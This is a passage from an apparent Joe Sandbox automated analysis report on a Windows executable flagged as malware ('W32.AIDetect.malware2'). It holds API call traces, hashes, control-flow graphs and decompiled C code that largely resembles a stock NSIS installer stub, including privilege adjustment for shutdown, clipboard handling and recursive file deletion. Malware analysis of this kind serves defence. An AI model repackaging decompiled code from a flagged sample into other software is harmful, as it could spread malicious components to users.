                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
                                                                            • DeleteFileW.KERNELBASE(1033), ref: 0040386F
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
                                                                              • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" ,00000000,?), ref: 0040397C
                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
                                                                            • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe,0042AA28,00000001), ref: 00403A0E
                                                                            • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
                                                                            • OleUninitialize.OLE32(?), ref: 00403A5E
                                                                            • ExitProcess.KERNEL32 ref: 00403A78
                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                            • ExitProcess.KERNEL32 ref: 00403B0C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                            • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                            • API String ID: 3859024572-2679640457
                                                                            • Opcode ID: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                            • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                            • Opcode Fuzzy Hash: e6a8171330b23895de066e2957319bca12562bbdb6a9eb3577c816747d85f5c1
                                                                            • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 143 4056de-4056f9 144 405888-40588f 143->144 145 4056ff-4057c6 GetDlgItem * 3 call 4044ce call 404e27 GetClientRect GetSystemMetrics SendMessageW * 2 143->145 147 405891-4058b3 GetDlgItem CreateThread CloseHandle 144->147 148 4058b9-4058c6 144->148 163 4057e4-4057e7 145->163 164 4057c8-4057e2 SendMessageW * 2 145->164 147->148 149 4058e4-4058ee 148->149 150 4058c8-4058ce 148->150 154 4058f0-4058f6 149->154 155 405944-405948 149->155 152 4058d0-4058df ShowWindow * 2 call 4044ce 150->152 153 405909-405912 call 404500 150->153 152->149 167 405917-40591b 153->167 159 4058f8-405904 call 404472 154->159 160 40591e-40592e ShowWindow 154->160 155->153 157 40594a-405950 155->157 157->153 165 405952-405965 SendMessageW 157->165 159->153 168 405930-405939 call 40559f 160->168 169 40593e-40593f call 404472 160->169 170 4057f7-40580e call 404499 163->170 171 4057e9-4057f5 SendMessageW 163->171 164->163 172 405a67-405a69 165->172 173 40596b-405996 CreatePopupMenu call 40657a AppendMenuW 165->173 168->169 169->155 182 405810-405824 ShowWindow 170->182 183 405844-405865 GetDlgItem SendMessageW 170->183 171->170 172->167 180 405998-4059a8 GetWindowRect 173->180 181 4059ab-4059c0 TrackPopupMenu 173->181 180->181 181->172 184 4059c6-4059dd 181->184 185 405833 182->185 186 405826-405831 ShowWindow 182->186 183->172 187 40586b-405883 SendMessageW * 2 183->187 188 4059e2-4059fd SendMessageW 184->188 189 405839-40583f call 4044ce 185->189 186->189 187->172 188->188 190 4059ff-405a22 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 188->190 189->183 192 405a24-405a4b SendMessageW 190->192 192->192 193 405a4d-405a61 GlobalUnlock SetClipboardData CloseClipboard 192->193 193->172
                                                                            C-Code - Quality: 95%
                                                                            			E004056DE(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405672, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040657A(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x433ecc == _t156) {
							ShowWindow( *0x434f08, 8);
							if( *0x434f8c == _t156) {
								_t119 =  *0x42c240; // 0x72cc24
								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E00404472(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404472(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404500(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E004044CE(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f10;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E004044CE( *0x433ed0);
				 *0x433ed4 = E00404E27(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404499(_a4);
				if(( *0x434f18 & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f18 & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004044CE( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f18 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                                            0x004056e6
                                                                            0x004056ec
                                                                            0x004056f6
                                                                            0x004056f9
                                                                            0x0040588f
                                                                            0x004058ac
                                                                            0x004058b3
                                                                            0x004058b3
                                                                            0x004058c6
                                                                            0x004058e4
                                                                            0x004058e6
                                                                            0x004058ee
                                                                            0x00405944
                                                                            0x00405948
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040594a
                                                                            0x00405950
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040595a
                                                                            0x00405962
                                                                            0x00405965
                                                                            0x00405a67
                                                                            0x00000000
                                                                            0x00405a67
                                                                            0x00405974
                                                                            0x0040597f
                                                                            0x00405988
                                                                            0x00405993
                                                                            0x00405996
                                                                            0x0040599f
                                                                            0x004059a5
                                                                            0x004059a8
                                                                            0x004059a8
                                                                            0x004059c0
                                                                            0x004059c9
                                                                            0x004059cc
                                                                            0x004059d3
                                                                            0x004059da
                                                                            0x004059e2
                                                                            0x004059e2
                                                                            0x004059f9
                                                                            0x004059f9
                                                                            0x00405a00
                                                                            0x00405a06
                                                                            0x00405a12
                                                                            0x00405a19
                                                                            0x00405a22
                                                                            0x00405a24
                                                                            0x00405a27
                                                                            0x00405a36
                                                                            0x00405a39
                                                                            0x00405a3f
                                                                            0x00405a40
                                                                            0x00405a46
                                                                            0x00405a47
                                                                            0x00405a48
                                                                            0x00405a50
                                                                            0x00405a5b
                                                                            0x00405a61
                                                                            0x00405a61
                                                                            0x00000000
                                                                            0x004059c0
                                                                            0x004058f6
                                                                            0x00405926
                                                                            0x0040592e
                                                                            0x00405930
                                                                            0x00405939
                                                                            0x00405939
                                                                            0x0040593f
                                                                            0x00000000
                                                                            0x0040593f
                                                                            0x004058fa
                                                                            0x00405904
                                                                            0x00000000
                                                                            0x004058c8
                                                                            0x004058ce
                                                                            0x00405909
                                                                            0x00000000
                                                                            0x00405912
                                                                            0x004058d7
                                                                            0x004058dc
                                                                            0x004058df
                                                                            0x00000000
                                                                            0x004058df
                                                                            0x004058c6
                                                                            0x004056ff
                                                                            0x00405703
                                                                            0x0040570b
                                                                            0x0040570f
                                                                            0x00405712
                                                                            0x00405715
                                                                            0x00405718
                                                                            0x0040571b
                                                                            0x0040571c
                                                                            0x0040571d
                                                                            0x00405736
                                                                            0x00405739
                                                                            0x00405743
                                                                            0x00405752
                                                                            0x0040575a
                                                                            0x00405762
                                                                            0x00405767
                                                                            0x0040576a
                                                                            0x00405776
                                                                            0x0040577f
                                                                            0x00405788
                                                                            0x004057aa
                                                                            0x004057b0
                                                                            0x004057c1
                                                                            0x004057c6
                                                                            0x004057d4
                                                                            0x004057e2
                                                                            0x004057e2
                                                                            0x004057e7
                                                                            0x004057f5
                                                                            0x004057f5
                                                                            0x004057fa
                                                                            0x004057fd
                                                                            0x00405802
                                                                            0x0040580e
                                                                            0x00405817
                                                                            0x00405824
                                                                            0x00405833
                                                                            0x00405826
                                                                            0x0040582b
                                                                            0x0040582b
                                                                            0x0040583f
                                                                            0x0040583f
                                                                            0x00405853
                                                                            0x0040585c
                                                                            0x00405865
                                                                            0x00405875
                                                                            0x00405881
                                                                            0x00405881
                                                                            0x00000000

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                            • GetClientRect.USER32(?,?), ref: 00405788
                                                                            • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                                            • ShowWindow.USER32(00000000), ref: 004058D7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                            • ShowWindow.USER32(00000008), ref: 00405926
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                            • CreatePopupMenu.USER32 ref: 0040596B
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                            • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                            • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                            • EmptyClipboard.USER32 ref: 00405A06
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                            • CloseClipboard.USER32 ref: 00405A61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                            • String ID: {
                                                                            • API String ID: 590372296-366298937
                                                                            • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                            • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                            • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                                            • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 442 405c49-405c6f call 405f14 445 405c71-405c83 DeleteFileW 442->445 446 405c88-405c8f 442->446 447 405e05-405e09 445->447 448 405c91-405c93 446->448 449 405ca2-405cb2 call 40653d 446->449 450 405db3-405db8 448->450 451 405c99-405c9c 448->451 455 405cc1-405cc2 call 405e58 449->455 456 405cb4-405cbf lstrcatW 449->456 450->447 454 405dba-405dbd 450->454 451->449 451->450 457 405dc7-405dcf call 406873 454->457 458 405dbf-405dc5 454->458 459 405cc7-405ccb 455->459 456->459 457->447 465 405dd1-405de5 call 405e0c call 405c01 457->465 458->447 462 405cd7-405cdd lstrcatW 459->462 463 405ccd-405cd5 459->463 466 405ce2-405cfe lstrlenW FindFirstFileW 462->466 463->462 463->466 482 405de7-405dea 465->482 483 405dfd-405e00 call 40559f 465->483 468 405d04-405d0c 466->468 469 405da8-405dac 466->469 470 405d2c-405d40 call 40653d 468->470 471 405d0e-405d16 468->471 469->450 473 405dae 469->473 484 405d42-405d4a 470->484 485 405d57-405d62 call 405c01 470->485 474 405d18-405d20 471->474 475 405d8b-405d9b FindNextFileW 471->475 473->450 474->470 478 405d22-405d2a 474->478 475->468 481 405da1-405da2 FindClose 475->481 478->470 478->475 481->469 482->458 486 405dec-405dfb call 40559f call 4062fd 482->486 483->447 484->475 487 405d4c-405d55 call 405c49 484->487 495 405d83-405d86 call 40559f 485->495 496 405d64-405d67 485->496 486->447 487->475 495->475 499 405d69-405d79 call 40559f call 4062fd 496->499 500 405d7b-405d81 496->500 499->475 500->475
                                                                            C-Code - Quality: 98%
                                                                            			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405F14(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040653D(0x42f270, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E58(_t68);
					} else {
						lstrcatW(0x42f270, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040653D(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405C01(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E0040559F(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E0040559F(0xfffffff1, _t68);
											E004062FD(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C49(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f270 - 0x5c;
					if( *0x42f270 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406873(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405E0C(_t68);
							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E0040559F(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E0040559F(0xfffffff1, _t68);
							return E004062FD(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                            0x00405c53
                                                                            0x00405c58
                                                                            0x00405c61
                                                                            0x00405c64
                                                                            0x00405c6c
                                                                            0x00405c6f
                                                                            0x00405c72
                                                                            0x00405c7a
                                                                            0x00405c7c
                                                                            0x00405c7d
                                                                            0x00000000
                                                                            0x00405c7d
                                                                            0x00405c88
                                                                            0x00405c8b
                                                                            0x00405c8b
                                                                            0x00405c8b
                                                                            0x00405c8f
                                                                            0x00405ca2
                                                                            0x00405ca9
                                                                            0x00405cae
                                                                            0x00405cb2
                                                                            0x00405cc2
                                                                            0x00405cb4
                                                                            0x00405cba
                                                                            0x00405cba
                                                                            0x00405cc7
                                                                            0x00405ccb
                                                                            0x00405cd7
                                                                            0x00405cdd
                                                                            0x00405ce2
                                                                            0x00405ce8
                                                                            0x00405cf3
                                                                            0x00405cf9
                                                                            0x00405cfb
                                                                            0x00405cfe
                                                                            0x00405da8
                                                                            0x00405da8
                                                                            0x00405dac
                                                                            0x00405dae
                                                                            0x00405dae
                                                                            0x00405dae
                                                                            0x00405dae
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405d04
                                                                            0x00405d04
                                                                            0x00405d04
                                                                            0x00405d0c
                                                                            0x00405d2c
                                                                            0x00405d34
                                                                            0x00405d39
                                                                            0x00405d40
                                                                            0x00405d5b
                                                                            0x00405d60
                                                                            0x00405d62
                                                                            0x00405d86
                                                                            0x00405d64
                                                                            0x00405d64
                                                                            0x00405d67
                                                                            0x00405d7b
                                                                            0x00405d69
                                                                            0x00405d6c
                                                                            0x00405d74
                                                                            0x00405d74
                                                                            0x00405d67
                                                                            0x00405d42
                                                                            0x00405d48
                                                                            0x00405d4a
                                                                            0x00405d50
                                                                            0x00405d50
                                                                            0x00405d4a
                                                                            0x00000000
                                                                            0x00405d40
                                                                            0x00405d0e
                                                                            0x00405d16
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405d18
                                                                            0x00405d20
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405d22
                                                                            0x00405d2a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405d8b
                                                                            0x00405d93
                                                                            0x00405d99
                                                                            0x00405d99
                                                                            0x00405da2
                                                                            0x00000000
                                                                            0x00405da2
                                                                            0x00405ccd
                                                                            0x00405cd5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c91
                                                                            0x00405c91
                                                                            0x00405c93
                                                                            0x00405db3
                                                                            0x00405db5
                                                                            0x00405db8
                                                                            0x00405e09
                                                                            0x00405e09
                                                                            0x00405e09
                                                                            0x00405dba
                                                                            0x00405dbd
                                                                            0x00405dc8
                                                                            0x00405dcd
                                                                            0x00405dcf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405dd2
                                                                            0x00405dde
                                                                            0x00405de3
                                                                            0x00405de5
                                                                            0x00000000
                                                                            0x00405e00
                                                                            0x00405de7
                                                                            0x00405dea
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405def
                                                                            0x00000000
                                                                            0x00405df6
                                                                            0x00405dbf
                                                                            0x00405dbf
                                                                            0x00000000
                                                                            0x00405dbf
                                                                            0x00405c99
                                                                            0x00405c9c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405c9c

                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                            • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                            • FindFirstFileW.KERNELBASE(0042F270,?,?,?,0040A014,?,0042F270,?,?,76FA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                            • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
